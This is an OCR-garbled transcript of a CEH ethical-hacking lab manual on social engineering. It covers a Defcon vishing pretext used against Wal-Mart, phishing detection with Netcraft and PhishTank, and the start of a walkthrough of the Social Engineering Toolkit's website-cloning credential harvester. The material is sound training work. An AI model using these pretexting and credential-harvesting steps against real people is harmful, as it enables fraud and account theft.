Ceh v8 labs module 09 social engineering
Upcoming SlideShare
Loading in...5
×
 

Ceh v8 labs module 09 social engineering

on

  • 176 views

 

Statistics

Views

Total Views
176
Views on SlideShare
176
Embed Views
0

Actions

Likes
0
Downloads
54
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Ceh v8 labs module 09 social engineering Ceh v8 labs module 09 social engineering Document Transcript

    • CEH Lab Manual S o c ia l E n g in e e r in g M o d u le 0 9
    • M odule 09 - S o c ia l Engineering Social Engineering S o c ia l en g in eerin g is th e a r t o f co n vin cin g p eo p le to re v e a l c o n fid e n tia l in fo n m tio n . ICON KEY / V a lu a b le in f o r m a tio n ^ Test your L a b S c e n a r io Source: http:/ / monev.cnn.com/2012/08/O‫/־־‬technology‫/־‬walmart-liackde Icon/index, htm Social engineering is essentially the art of gaining access to buildings, systems, by exploiting human psychology, rather than by breaking 111 01‫ ־‬using technical hacking techniques. The term “social engineering” can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies 011 the trusting nature of most individuals. For example, instead of trying to find software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to tiick the employee into divulging 111s password. 01‫ ־‬data *5 W eb exercise £ Q W orkbook revie Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving 111111 information that could be used 111 a hacker attack to win a coveted “black badge” 111 the “social engineering” contest at the Deleon hackers’ conference 111 Las Vegas. 1 1 tins year's Capture the Flag social engineering contest at Defcon, champion 1 Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and 111s talent for self-effacing small talk to squeeze the following information out of Wal-Mart: ■ The small-town Canadian Wal-Mart store's janitorial contractor ■ Its cafeteria food-services provider ■ Its employee pay cycle ■ Its staff shift schedule ■ The time managers take then‫ ־‬breaks ■ Where they usually go for lunch ■ Type of PC used by the manager ■ Make and version numbers of the computer's operating system, and ■ Its web browser and antivirus software Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken 111 to the extent of coughing up so much scam-worthy treasure. Calling from 111s sound-proofed booth at Defcon MacDougall placed an “urgent” call, broadcast to the entire Deleon audience, to a Wal-Mart store manager 111 Canada, introducing liinisell as "Gan‫ ־‬Darnell" from Wal-Mart's home office 111 Bentonville, Ark. C E H Lab Manual Page 675 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering The role-playing visher (visliing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract. “Darnell'’ said that 111 job was to visit a few Wal-Mart stores that had been s chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture of how the store operated. 1 1 the conversation, which lasted about 10 minutes, “Darnell” described 1 himself as a newly lured manager of government logistics. He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton of cash off it,” he said, then went on to talk about his upcoming visit, keeping up a “steady patter” about the project and life 111 Bentonville, Crowley writes. As if tins wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey 111 preparation for 111s upcoming visit. The compliant manager obliged, plugging the address into 111s browser. When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked. After ending the call, stepping out of the booth and accepting 111s well-earned applause, MacDougall became the first Capture the Flag champion to capture even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers are verboten, given that Defcon has no great desire to bring the law down on its head. Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as ]MacDougall pulled down Wal-Mart's pants. MacDougall said, “Companies are way more aware about their security. They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break 111 these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.” MacDougall also shared few best practices to be followed to avoid falling victim to a social engineer: ■ Never be afraid to say no. If something feels wrong, something is wrong ■ An IT department should never be calling asking about operating systems, machines, passwords or email systems—they already know C E H Lab Manual Page 676 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering ■ Set up an internal company security word of the day and don’t give any information to anyone who doesn’t know it ■ Keep tabs 011 what’s 011 the web. Companies inadvertently release tons of information online, including through employees’ social media sites As an expert e t h i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you should circulate the best practices to be followed among the employees. & T o o ls d e m o n s tr a t e d in t h i s la b a r e a v a ila b le in D:CEHT o o lsC E H v 8 M o d u le 09 S o c ia l E n g in e e rin g L a b O b je c t iv e s The objective of this lab is to: ■ Detect phishing sites ■ Protect the network from phishing attacks To earn* out diis lab, you need: ■ A computer nuuiing Window Seiver 2012 ■ A web browser with Internet access L a b D u r a t io n Time: 20 Minutes O » T A S K v e r v ie w S o c ia l E n g in e e r in g 1 O v e rv ie w Social engineering is die art of convincing people to reveal confidential information. Social engineers depend 011 the fact that people are aware of certain valuable information and are careless 111 protecting it. L a b T a s k s Recommended labs to assist you 111 social engineering: ■ Social engineering ■ Detecting plusliuig using Netcraft ■ Detecting phishing using PliishTank L a b A n a ly s is Analyze and document the results related to the lab exercise. Give your opinion 011 your target’s security posture and exposure. P LE A S E C E H Lab Manual Page 677 TA LK TO Y O U R IN S T R U C T O R IF Y O U R E L A T E D TO T H IS LAB. H A V E Q U E ST IO N S Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering Delecting Phishing Using Netcraft N e trm ftp ro v id e s n ‫׳‬eb se rve r a n d n ‫׳‬eb h o stin g w a rk e t- sh a re a n a ly s is , in c lu d in g n ' b e se rve r a n d o p eratin g system d etectio n . ICON KEY L a b Valuable / information By now you are familiar with how social engineering is performed and what sort ot information can be gathered by a social engineer. .‫״*־‬v Test vour *a W eb exercise f f i! W orkbook revi! S c e n a r io Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity 111 an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, 01‫ ־‬IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing 01‫־‬ instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one. Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forgerT The messages sent claim to be from a bank and they look legitimate; . users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the plusher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake callerID data to give the appearance that calls come from a trusted organization. Since you are an expert e t h i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you must be aware of phishing attacks occurring 011 the network and implement antiphishing measures. 111 an organization, proper training must be provided to people to deal with phishing attacks. 111 this lab you will be learning to detect phishing using Netcraft. C E H Lab Manual Page 678 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering L a b O b je c t iv e s Tins kb will show you phishing sites using a web browser and show you how to use them. It will teach you how to: ■ Detect phishing sites ■ Protect the network from phishing attack To carry out tins lab you need: ^ ~ T o o ls d e m o n s tr a t e d in t h i s la b a r e a v a ila b le in D:CEHT o o lsC E H v 8 ■ N e t c r a f t is located at D :C E H -T o o lsC E H v 8 M o d u le 09 S o c ia l E n g in e e r in g A n ti- P h is h in g T o o lb a r N e tc r a f t T o o lb a r ■ You can also download the latest version of link http://toolbar.netcralt.com/ M o d u le 09 S o c ia l E n g in e e rin g ■ If you decide to download the the lab might differ N e t c r a f t T o o lb a r l a t e s t v e rs io n , from the then screenshots shown 111 ■ A computer running Windows Server 2012 ■ A web browser (Firefox, Internet explorer, etc.) with Internet access ■ Administrative privileges to run the Netcraft toolbar L a b D u r a t io n Time: 10 Minutes O v e r v ie w o f N e t c r a f t T o o lb a r Netcraft Toolbar provides I n t e r n e t s e c u r ity s e r v ic e s , including anti-fraud and anti-phishing services, a p p lic a tio n t e s ti n g , code reviews, automated penetration testing, and r e s e a r c h d a t a a n d a n a ly s is on many aspects of the Internet. L a b ^ T A S K 1 A n ti-P h ish in g T oo l bar C E H Lab Manual Page 679 T a s k s 1. To start this lab, you need to launch a web browser first. 1 1 this lab we 1 have used M o z illa F ire fo x . 2. Launch the S t a r t menu by hovering the mouse cursor on the lower-left corner of the desktop. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering JL ‫״‬ 5 Q = JY ou cau also download the Netcraft toolbar form http://toolbar. etcraft.com 11 * | Windows Server 2012 ! m i 2012R Icak CanJiaatr D c ot*c«nvtiftlmHon copy BwO M W F IG U R E 1.1: Windows Server 2012-Start Menu 3. Click the M o z illa F ir e f o x app to launch the browser. F IG U R E 1.2: Windows Server 2012-Start Menu Apps view 4. To download the N e t c r a f t T o o lb a r for M o z illa F ir e fo x , enter h ttp :// toolbar.11etcraft.com 111 the address bar of the browser or drag and drop the n e t c r a f t _ t o o l b a r - 1. 7-fx .x p i file 111 Firefox. 5. 1 1 tins lab, we are downloading the toolbar from the Internet. 1 6. 1 1 Firefox browser, click 1 the add-on. Netcraft provides Internet security services, including anti-fraud and anti-phishing services. ^ D o w n lo a d t h e N e t c r a f t T o o lb a r to install as ‫ןזח‬ ‫ת‬ etc M i f t SIN G LE H 3 P ■n ‫ן‬ , , M»tc‫»-׳‬ft Toolbar ‫• ■׳‬ Why u tt ‫ •יש‬N«tcraft Toolbar? U Protect your taviitQf fromI'hM htnq attack*, a s ethe hoittnq totat)or1and HfcMataiq 0 e e te 1< O Hlp e defend tt*c Internet commu‫«׳‬ltytrooi Ira F IG U R E 1.3: Netcraft toolbar downloading Page C E H Lab Manual Page 680 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 7. On the im a g e I n s ta ll page of the Netcraft Toolbar site, click the to continue with installation. fc 4 c P ftO l 1 nETCI^AFT ‫■(., ־ » ״‬ . F ir e fo x D ow nload Now Netcraft Anti Phithing Toolbar & [QQ Netcraft is an Internet services company based in Bath, England. System Raqulramanla F IG U R E 1.4: Netcraft toolbar Installation Page 8. Click A llo w to download Netcraft Toolbar. ^ a■*«.ne<r<ft<omId<ti t1c 0 ) ‫ סי*ז‬ye.e‫׳‬t* th »« d « SNGLEH2r 1 -‫1■ -־‬ Teotbir D ow nload Now N*te«H Antl-PN«hl0<Todhtr ‫׳‬ r= rs a Systam Kaquirtmanti 'oolba• <uppor‫׳‬ > a l« # (AMnn/HMnji) r>*p tfc rre « cwitnn rv > < > 1cnsorthe tootta r«r ar» orte b w t« 1 nxdrg ««>« tu w « ooea. andvaran a « e$ Help & Support ro o •in t«llin ? fm• ••id‫־‬tr ...l.ll.l.‫״־‬ Mm a Q « a h i 8 1 0 tu fw < uw1« tog«t t*em«t oa tf »• 1 lso a»» rt«t «n » to is yo wanrttoofcx F IG U R E 1.5: Netcraft toolbar Installation-Allow button 9. When the S o ftw a r e In s ta lla tio n dialog box appears, click I n s ta ll N ow . Software Installation Install add-ons only from authors w ho m you trust. Malicious software can damage your computer or violate your privacy. You have asked to install the following item: Netcraft Anti-Phishing Toolbar (Netcraft Ltd) £ Q Netcraft Toolbar provides a wealth o f information about the sites you visit. http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi Install Now Cancel F IG U R E 1.6: Installing Netcraft Toolbar 10. To complete the installation it will ask you to restart the browser. Click R e s ta r t N ow . C E H Lab Manual Page 681 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering . l _ Risk Rating displays the _ trustworthiness of die current ■A < n t(ifT • o o cntt/ K H• p & Support • l* 1gUHnIm lnilM 1 «w ■ • iui InilaMu• *Mr iu1 ‫׳‬l‫׳‬ ■I ‫ י‬Ao jlec h v« jM 1 laclKM iito ijit tfyo •it « with* non < t0 9 M M toabJt x/ u 0 u 1 ‫•י‬ •o«t 1 Oimmh'it >< M «n w r«dn air M h O nv 14 tU M ir (juM tm O F IG U R E 1.7: Restarting Firefox browser 11. N e t c r a f t T o o lb a r is now visible. Once the T o o lb a r is installed, it looks similar to the following figure. p U---- >«rw •t SatejtfuaitontiltiOflC1 1 *1 1 * ‫-ם‬ J F IG U R E 1.8: Netcraft Toolbar on Mozilla Firefox web browser 12. When you visit a site, the following information displays 111 the Toolbar (unless the page has been blocked): R is k r a t in g , R a n k , and F la g . 13. Click S it e R e p o rt to show the report of the site. 0=5! Site report links to : detailed report for die F IG U R E 1.9: Report generated by Netcraft Toolbar 14. If you attempt to visit a page that has been identified as a pliishing page by Netcraft Toolbar you will see a w a r n in g d ia lo g that looks similar to the one in the following figure. 15. Type, as an example: http: / / www.pavpal.ca.6551 .secure7c.mx / images / cgi.bin C E H Lab Manual Page 682 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering £ 0 . Phishing a site feeds continuously updated encrypted database of patterns diat match phishing URLs reported by the Netcraft Toolbar. F IG U R E 1.10: Warning dialog for blocked site 16. If you trust that page click Y e s to open it and if you don’t, click N o ( R e c o m m e n d e d ) to block that page. 17. If you click N o the following page will be displayed. 4‫א‬ Kl ln c Co of b fi ft C - .■!‫ ■ר‬P K n S Hccl ! !• ! h Mg *o lokx ! %lll t» ‫־‬ ... -m;. : L ■ F IG U R E 1.11: Web page blocked by N etcraft Toolbar L a b A n a ly s is Document all die results and report gathered during die lab. Tool/Utility Information Collected/Objectives Achieved Netcraft P LE A S E Q TA LK ■ Phishing site detected TO Y O U R IN S T R U C T O R IF Y O U R E L A T E D TO T H IS LAB. H A V E Q U E ST IO N S u e s t io n s 1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy. C E H Lab Manual Page 683 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 2. Determine it you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how? 3. How can you stop the Toolbar warning if a site is trusted? Internet Connection Required □ N< Platform Supported 0 Classroom C E H Lab Manual Page 684 □ !Labs Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 3 Detecting Phishing Using PhishTank P h is h T a n k is a c o lla b o ra tiv e clearin g h o u se fo r d a ta a n d in fo rm a tio n reg ard in g p h is h in g on th e In te rn e t. ICON KEY Valuable _____ information .‫* ־‬ > Test yo u r gfe W eb exercise W orkbook r‫׳‬e‫־‬ L a b S c e n a r io Phishing is an attempt by an individual 01‫ ־‬group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization 01‫ ־‬known individual. These emails often attempt to entice users to click 011 a link that will take the user to a fraudulent website that appears legitimate. Hie user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code. With the tremendous increase 111 the use of online banking, online share trading, and ecommerce, there has been a corresponding growth 111 the incidents of phishing being used to carry out financial frauds. Phisliing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details etc.) by masquerading as a masted entity. 111 the previous lab you have already seen how a phishing site can be detected using the Netcraft tool. The usual scenario is that the victim receives an email that appears to have been sent from 111s bank. The email urges the victim to click 011 the link 111 the email. When the victim does so, he is taken to “a secure page 011 the bank’s website.” The victim believes the web page to be authentic and he enters 11 s user name, 1 password, and other information. 111 reality, the website is a fake and the victim’s information is stolen and misused. Being an administrator 01‫ ־‬penetration tester, you might implement all the most sophisticated and expensive technology solutions 111 the world; all of it can be bypassed if your employees fall for simple social engineering scams. It become C E H Lab Manual Page 685 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering your responsibility to educate employees information. 011 best practices for protecting Phishing sites 01‫ ־‬emails can be reported to plusl11ng-report@us-cert.gov http: / / www.us-cert.gov/ 11av/report ph 1sh111g.html US-CERT (United States Computer Emergency Readiness Team) is collecting phishing email messages and website locations so that they can help people avoid becoming victims of phishing scams. [C T T ools d e m o n s tr a t e d in th i s la b a r e a v a ila b le in D:CEHT oo lsC E H v 8 M o d u le 09 S o c ia l E n g in e e rin g L a b O b je c t iv e s This lab will show you how to use phishing sites using a web browser. It will teach you how to: ■ Detect phishing sites ■ Protect the network from phishing attacks L a b E n v ir o n m e n t To carry out the lab you need: ■ A computer running Windows Server 2012 ■ A web browser (Firefox, Internet Explorer, etc.) with Internet access L a b D u r a t io n Tune: 10 Minutes O £ Q PhishTank U R L: http.//www.phishtank.com v e r v ie w T A S K P h is k T a n k PhishTank is a f r e e c o m m u n ity s i t e where anyone can submit, verity, track, and s!1are p h is h in g d a ta . PhishTank is a collaborative clearing house for data and information regarding phishing 011 the Internet. Also, PhishTank provides an o p e n API tor developers and researchers to integrate anti-phishing data into their applications at 110 charge. L a b m. o f 1 P h is h T a n k C E H Lab Manual Page 686 T a s k s 1. To start this lab you need to launch a web browser first. 1 1 this lab we 1 have used M o z illa F ire fo x . 2. Launch the S t a r t menu by hovering the mouse cursor corner of desktop. 011 the lower-left Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering jw $ 23 Windows Server 2012 W ndow icrrct 2 1 IUIe.mC vl!u 0*t»c«n* a 02 «> atr kialualoncop H MW‫׳‬ y u!a - g •*fa F IG U R E 2.1: Windows Server 2012-Start Menu 3. Click the M o z illa F ir e f o x app to launch the browser. £01 PlushTaiik provides an open A P I for developers and researchers to integrate antiphishing data into dieir applications at no charge. F IG U R E 2.2: Windows Server 2012-Start Menu Apps view 4. Type h tt p :/ /w w w .p h is h ta n k .c o m and press E n te r. 111 the address bar of the web browser 5. You will see the follow‫־‬ ‫ ׳‬ing PhishTank ‫.. י . ״ ״ ־‬ Jo in tie fiylitayaiittt ptiialiiiKj S to rts p g p sh s Track th Uatis oy usuhmfyaons u m ts sd d h e e f or Develop s ftwr w o rfr eAPI. o ae ith u e Verfy <cje'sbatn Arsnumo. a R Su n rs ecert b issb 17 S S:£1 rtn«r»niTKrsfjnn.’iTVMt/ieya'AijaaaJ e lPiOO ^*®:/VrstM .axVsy *rt>-r tom lg liia rtc usemncs.aebfu.ictscmnsraurAxroim m .cvn’PM lct.K i /iM n F IG U R E 2.3: Welcome screen o f PhishTank C E H Lab Manual Page 687 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 1 PliishTauk s operated by Open D N S to improve the Internet through safer, faster, and smarter D N S. 6. Type the w e b s i t e URL to be checked for phishing, for example, http: / / sdapld21.host21.com. 7. Click I s it a p h is h ? . Jo in the fight against phishing Submrt tu w c » d phsftua. ‫־‬ Rack the ttatic of 1cur submissions / Vecfyoher jscts suonssnns Develop software wim our ftee API. r //KiJptaV.ItMtUcem ttp j R#c*r< SubTKSors >ftLIm »u»p«>.le0pirn mm i *MhTink provttet »‫ ׳‬oh‫ ״‬An tar ■d )fjst) lu im ' ImiTVl. J C Y 4 IU ... F IG U R E 2.4: Checking for site If the site is a p h is h in g PhishTank s ite , you see the following warning dialog box. O of it* NM.i«o*MTw* k Submission #1571567 is aimentty ONLINE 0 2 Open D N S is interested in having die best available information about phishing websites. S01 n or Hcgcto‫ ׳‬tovert, t !6 sutxnssior. No screenshot yet We have not ye! successfully taken a screeasltol •f the submitted website. F IG U R E 2.5: Warning dialog for phishing site L a b A n a ly s is Document all die websites and verify whether diey are phishing sites. Tool/Utility PhiskTank C E H Lab Manual Page 688 Information Collected/Objectives Achieved ■ Phishing site detected Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering PLE A SE Q TA LK TO Y O U R IN S T R U C T O R IF Y O U R E L A T E D TO T H IS LAB. H A V E Q U E ST IO N S u e s t io n s 1. Evaluate what PhishTank wants to hear about spam. 2. Does PhishTank protect you from phishing? 3. Why is Open DNS blocking a phish site that PhishTank doesn't list or has not vet verified? Internet Connection Required 0 Yes □ No Platform Supported 0 Classroom C E H Lab Manual Page 689 □ !Labs Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 3 Social Engineering Penetration Testing using Social Engineering Toolkit (SET) T h e S o c ia / E n g in e e r T o o / k it (S E T ) is a n open-source P yth o n - d rive n to o l aim e d a t ‫־‬ p e n e tra tio n te stin g a ro u n d s o c ia l en g in eerin g ■c o n L a b k e y £__ Valuable information s S c e n a r io Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies even‫ ־‬day. Even though there are many hacking tools available with underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-pliishing attacks, website attacks, etc. Attackers can draft email messages and attach malicious files and send them to a large number of people using the spear-pliishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/ Tabnabbing, etc. all at once. Test your knowledge W eb exercise m W orkbook review Though numerous sorts ot attacks can be performed using tins toolkit, tins is also a must-liave tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily witlun the security community. As an e t h i c a l h a c k e r , penetration tester, or s e c u r i t y a d m i n i s t r a t o r you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities 011 the network. L a b O b je c t iv e s The objective of tins lab is to help sUidents learn to: ■ Clone a website ■ Obtain user names and passwords using the Credential Harvester method ■ Generate reports for conducted penetration tests C E H Lab Manual Page 690 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering & T o o ls d e m o n s tr a t e d in t h i s la b a r e a v a ila b le in D:CEHT o o lsC E H v 8 M o d u le 09 S o c ia l E n g in e e rin g L a b E n v ir o n m e n t To earn’ out die kb, you need: ■ Run this tool 111 B a c k T r a c k Virtual Machine ■ Web browser with Internet access ■ Administrative privileges to mn tools L a b D u r a t io n Tune: 10 Minutes O v e r v ie w o f S o c ia l E n g in e e r in g T o o lk it Sockl-Enguieer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. The (SET) is specifically designed to perform advanced attacks against die human element. The attacks built into die toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. L a b T a s k s 1. Log in to your B a c k T r a c k virtual machine. T A S K 1 E x e c u te S o c ia l E n g in e e rin g T o o lk it 2. Select A p p lic a t io n s ‫ ^־־‬B a c k T r a c k ‫ ^־־‬E x p lo ita tio n T o o ls ‫ ^־־‬S o c ia l E n g in e e r in g T o o ls ‫ ^־־‬S o c ia l E n g in e e r in g T o o lk it ^ Applications[ Places System [>7] 3 |Q In rmtio G th rin ^ fo a n a e g r■ v ln ra ilityA s s mn u e b ses e t J 0 E p ita nT o x lo tio o ls P g E c la n rivile e s a tio Ef Min in gA c s a ta in c e s ^ R v rs E g e rin e e e n in e g I R ID O ls F To O .-f * Network Exploitanor Tools Web Exploitation Tools D ta a eE p ita nT o ^ a b s x lo tio o ls Wireless Exploitation Tools Social E’ jifM 9 | Physical Exploitation ‫י‬Open Source Exp loited ,h set 3 Forensic!* and click S e t. Tue Sep 25. 7:10 PM a 9 BEEF XSS Framework 9 HoneyPots 11• Social Engineering Toolkit KCporting Tools ( P services y Miscellaneous << back track F IG U R E 3.1: Launching S E T in BackTrack C E H Lab Manual Page 691 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering 3. f f is E T has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. A T e r m in a l window for SET will appear. Type agree to the terms of service. y and press E n te r to File Edit V iew Term inal Help THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The above li c e n s i n g was ta k e n fro m th e BSD lic e n s i n g a n d ^ is a p p lie d t o S o c ia l-E n g in e e r T o o l k i t as w e l l . ___ " * ^ 1 N ote t h a t th e S o c ia l- E n g in e e r T o o l k i t i s p r o v id e d as i s , and i s p e n -s o u rc e a p p lic a t i o n . M r 3 r o y a lt y f r e e 0 F e e l f r e e t o m o d ify , u s e , c han ge, m a rk e t, do w h a te v e r § u w a n t w i t h i t a f lo n g a s you g iv e th e a p p r o p r ia te c r e d i t w here c r e d i t i s due (w h ic h means g i v in g th e a u th o r s th e c r e d i t t h e y ife s e r v e f o r w r i t i n g i t ) . A ls o n o te t h a t by u s in g t h i s s o f tw a r e , i f you e v e r see th e c r e a t o r o f SET i n a b a r , you a re r e q u ir e d t o g iv e him a hug and buy him a b e e r. Hug m ust l a s t a t le a s t 5 s e c o n d s . A u th o r h o ld s th e r i g f t t t o re fip s e th e hug o r th e b e e r . ■ f | ‫ן‬ ^ £ Q ‫׳‬The web jacking attack is performed by replacing the victim ’s browser with another window that is made to look and appear to be a legitimate site. T ^ ^ * c M 1- E t l^ e e r T A lk it W s r y T ig f lf ijp y e ly good pn<r f l o t ' B k i l . I f y o u a r e J t a ^ op I ^ S 4a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c 1 n W c r a t h O T f t f l b ^ t h e l: o m p a n y * y m j a r e ^ r e r f O T ll™ a ^ e s s « e r r ^ J ‫׳‬ou a r e v i o l a t in g t h e te rm s o f s e r v i e and li c e n s e o f t h i s t o o l s e t . B^ r t tin q X yes ( o n ly one t im e ) , you a g re e t o th e te rm s o f s e r v ic e a n d T n a t y o u w i l l o n ly us e t h i s t o o l f o r l a w f u l p u rp o s e s o n ly . F IG U R E 3.2: S E T Service Agreement option 4. You will be presented will a list of menus to select the task. Type 1 and press E n te r to select the S o c ia l - E n g in e e r in g A t t a c k s option. File Edit V iew Term inal Help Homepage: h ttp s : / /w w w . t r u s t e d s e c . c o m [ Welcome t o th e S o c ia l- E n g in e e r T o o l k i t ( S E T J j.Y o u r one s to p shop f o r a l l o f y o u r s o c ia l- e n g in e e r in g n e e d s . ^ , J o in us on ir c . f r e e n o d e . n e t i n c h a n n e l # s e « J o lk it The Social-Engineer Toolkit is a product of TrustedSec. f f is E T allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads. Visit: https://www.trusted5ec.com S e le c t fro m th e menu: J 1) S o c ia l- E n g in e e r in g A t ta c k s I 2) F a s t- T ra c k P e & t r a t io n T e s t in g 3 ‫ י‬T h ir d p .n rty M odules 4) U p date th e M e ta s p lo it S ra n e i/o rk 5 ) U p date th e S o c ia l- E n g in e e r T o o lk it 6 ) U pdate SET c o n f ig u r a t i o n 7) H e lp , C r e d it s , and A b out _ 99) E x i t t h e S o c ia l- E n g in e e r T o o lk it F IG U R E 3.3: S E T Main menu 5. C E H Lab Manual Page 692 A list of menus 111 Social-Enguieermg Attacks will appear; type 2 and press E n te r to select W e b s i te A t t a c k V e c to r s . Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.]
    • M odule 09 - S o c ia l Engineering « T e r m in a l File Edit V iew Term inal Help J o in us on ir c . f r e e n o d e . n e t i n c h a n n e l # s e t o o lk 1 t The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com C Q t i! e Social-Engineer Toolkit "W eb Attack" vector is a unique way of utilizing multiple webbased attacks in order to compromise the intended victim. S e le c t fro m th e menu: 1) S p e a r -P h is h in q A t ta c k Vec t o r s | 2) W e b s ite A t ta c k V e c to r s | 3) I n f e c t io u s M edia G e n e ra to r 4 ) C re a te a P a y lo a d and L is t e n e r _ 5) Hass M a ile r A t ta c k ‫ן‬ I 6 ) A rd u in o -B a s e d A t t a c k v e c t o r g | ^ % S M S S p o o fin g A tta c k V e c t o r ♦ 8) W ir e le s s A c c e s s P o in t A t ta c k V e c to r 9 ) QRCode G e n e ra to r A t t a c | V e c to r 10) P o w e rs h e ll A t ta c k V e c t l r s 11) T h ir d P a r ty M odules _ ^ I A 99) R e tu rn b ack t o t h e m ain menu. >r5s____________________________________________________ F IG U R E 3.4: Social Engineering Attacks menu 6. 1 1 the next set of menus that appears, type 3 and press 1 the C r e d e n tia l H a r v e s t e r A t ta c k M e th o d E n te r to select File Edit View Term inal Help 0 3 Th e Credential Harvester Method w ill utilize web cloning o f a website that has a username and password field and harvest all die information posted to die website. and th e B a c k |T ra c k team . T h is method u t i l i z e s !fr a m e re p la c e m e n ts t o make th e h ig h li g h t e d URL l i n k t o a p p e a r l e g it im a t e how ever *tf 1en c lic k e d a w indow pops up th e n i s re p la c e d w i t h th e m a lic io u s l i n k . You can e d i t th e l i n k re p la c e m e n t s e t t i n g s i n th e s e t^ c o n F ig i f i t s to n fc * k o « /f 